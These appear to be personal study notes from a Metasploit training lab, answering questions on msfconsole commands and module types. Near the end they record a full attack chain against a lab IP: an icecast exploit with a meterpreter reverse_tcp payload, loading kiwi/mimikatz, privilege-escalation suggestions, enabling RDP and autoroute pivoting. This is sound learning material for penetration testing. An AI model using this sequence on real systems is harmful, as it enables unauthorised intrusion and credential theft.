 
 Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching? - Search
 

 Once we've found the module we want to leverage, what command we use to select it as the active module? - Use
 
 
 How about if we want to view information about either a specific module or just the active one we have selected? - Info
 
 Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can 'talk' to it. What command is this? - Connect
 
 Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)? - Banner
 
 We'll revisit these next two commands shortly, however, they're two of the most used commands within Metasploit. First, what command do we use to change the value of a variable? - Set
 
 Metasploit supports the use of global variables, something which is incredibly useful when you're specifically focusing on a single box. What command changes the value of a variable globally? - Setg
 
 Now that we've learned how to change the value of variables, how do we view them? There are technically several answers to this question, however, I'm looking for a specific three-letter command which is used to view the value of single variables. - Get rhost
 
 How about changing the value of a variable to null/no value? - Unset
 
 When performing a penetration test it's quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file? - Spool
 
 Leaving a Metasploit console running isn't always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file. - Save

Check all the Metasploit modules!

Easily the most common module utilized, which module holds all of the exploit code we will use? - exploit

Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation? - payload

Which module is most commonly used in scanning and verification machines are exploitable? This is not the same as the actual exploitation of course. - auxiliary (red hat)

One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities? - post

Last but not least, which module is used with buffer overflow and ROP attacks? - nop

Not every module is loaded in by default, what command can we use to load different modules? - load


db_nmap -sV -Pn 10.10.24.178 (nmap "inside" metasploit)

hosts - shows the host we scanned

services - shows the open ports and what is running on them

vulns - shows detected vulns

use icecast - select the method

set PAYLOAD windows/meterpreter/reverse_tcp - set the payload

set LHOST 10.8.252.117 - set lhost to our ip

set RHOSTS 10.10.24.178 - set the host we want to attack

run -j - run attack as a job

jobs - check running jobs

sessions - check running sessions

sessions -i 1 - interact with session 1

ps - see what's running on the target system (looking for spoolsv.exe)

Let's go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won't work at the current time as we don't have sufficient privileges but we can still try! - migrate

What command can we run to find out more information regarding the current user running the process we are in? - getuid

How about finding more information out about the system itself? - sysinfo

This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it? - load kiwi

Let's go ahead and figure out the privileges of our current user, what command do we run? - getprivs

What command do we run to transfer files to our victim computer? - upload

How about if we want to run a Metasploit module? - run

A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim? - ipconfig

run post/multi/recon/local_exploit_suggester - check wich exploits can be used to escalate privileges

run post/windows/manage/enable_rdp - only works if we are admins. Opens rdp

One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell? - shell

run autoroute -h - setup routing to reach networks that the machine is connected to

sudo nmap -sV -p- 10.10.194.187 -vv - check services running in each port

https://www.exploit-db.com/exploits/568
